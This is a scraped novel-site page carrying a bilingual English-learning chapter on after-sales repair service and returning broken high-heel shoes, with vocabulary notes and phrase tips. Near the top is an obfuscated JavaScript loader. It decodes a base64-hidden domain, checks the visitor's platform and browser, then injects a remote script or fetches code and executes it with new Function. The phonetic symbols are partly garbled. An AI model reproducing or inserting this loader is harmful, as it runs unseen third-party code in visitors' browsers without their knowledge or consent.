妙书阁小说

阅读记录  |   用户书架
上一页
目录 | 设置
下一章
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};

04 销售服务(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

店家:没问题。

notes

1. freeze [fri:z] v.(使)结冰;n. 冻结,冰冻;凝固,静止

2. hardware [?hɑ:dw??] n. 硬件

3. virus [?vai?r?s] n. 病毒,病毒性疾病;恶毒,恶意

4. infect [in?fekt] v.(受)传染;污染;影响

5. activate [??ktiveit] v. 使活动,起动;触发,激活

6. efficientl [i&#039;fi??ntli] adv.效率高地,有效地

7. validity [v??liditi] n. 有效(期),效力,合法性;正当,正确

8. route [ru:t] n. 路,路途,路线,路程

小贴士

1. i often maintain my computer occasionally at certain intervals.

我经常每隔一段时间就把电脑维修一次。

2. what is the validity of this tv?

这台电视的保修期是多长时间?

3. please keep your warranty card well. you need to show that when you want a maintaining service.

请妥善保管保修卡。如果你需要维修服务时,请出示保修卡。

4. have you finished the repairing of my car?

我的车修好了吗?

5. it is always free of charge whenever you need a repair.

随时免费进行维修。

6. you can call this number if you need a repairing service.

如果需要维修服务就打这个电话。

退换货物

dialogue

the high-heel shoes emily just bought have been worn out.

埃米莉刚买的高跟鞋坏了。

emily: the high-heel shoes have been worn out. the heel of the left shoe was broken.

埃米莉:这双高跟鞋出问题了,左鞋跟坏了。

seller: i&#039;m sorry, madam. how long have you kept this pair of shoes from here?

店家:很抱歉,女士。您买这双鞋有多久了?

emily: about one week.

埃米莉:大概一周。

seller: ok, according to the guarantee, we&#039;ll check it for a few minutes. if it is caused by the quality, we&#039;ll change a new pair for you.

店家:好的,根据保修单,我们会花几分钟时间进行检查。如果是由于质量问题引起的,我们会为您换一双新的。

emily: the quality is too poor. i have just worn them for a few days.

埃米莉:质量太差了,我才刚穿了几天。

seller: from the feedback of selling, there are few chances for such kind of thing happening. we are deeply sorry for it this time.

卖家:从销售的反馈情况来看,这种情况发生的几率很小。这次我们深表歉意。

emily: what if it happens again?

埃米莉:如果再发生这种情况呢?

seller: we can guarantee that it won&#039;t happen again, madam.

卖家:我们保证以后不再发生,女士。

emily: i mean just in case?

埃米莉:我是说万一呢?

seller: then we will return your money back, madam. but we will try our best to make you satisfied this time.

卖家:那我们会退还您的费用,女士。但这次我们会尽最大努力使您满意。

emily: ok, i trust you.

埃米莉:好吧,我相信你。

notes

1. heel [hi:l] n. 足跟,踵部,后跟;v.(使)倾斜

2. cause [k?:z] n. 原因,起因;事业;原则;v. 成为……的原因,引起,促使,使发生

3. poor [pu?] adj. 贫困的,贫穷的;低劣的,次等的;(身体)衰弱的;可怜的,不幸的

4. feedback [?fi:db?k] n.反馈;反馈信息

5. trust [tr?st] n. 信任,相信;托管;关怀;职责;v. 相信,信任

小贴士

1. i&#039;d like to exchange this earphone. the tone quality is too bad.

我要退换这副耳机,音质太差了。

2. we can&#039;t accept the returning if there&#039;s no receipt.

没有收据我们是不能退换的。

3. this shirt had lost its color after the first washing.

这件衣服洗了一次就掉颜色了。

4. we can change a new one for you.

我们可以为您换一个新的。

5. there&#039;s a quality problem with the shoes. they were broken so easily.

这鞋的质量有问题,这么容易就穿破了。

6. would you like an exchange or a refund?

您是想要换货还是退货?

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间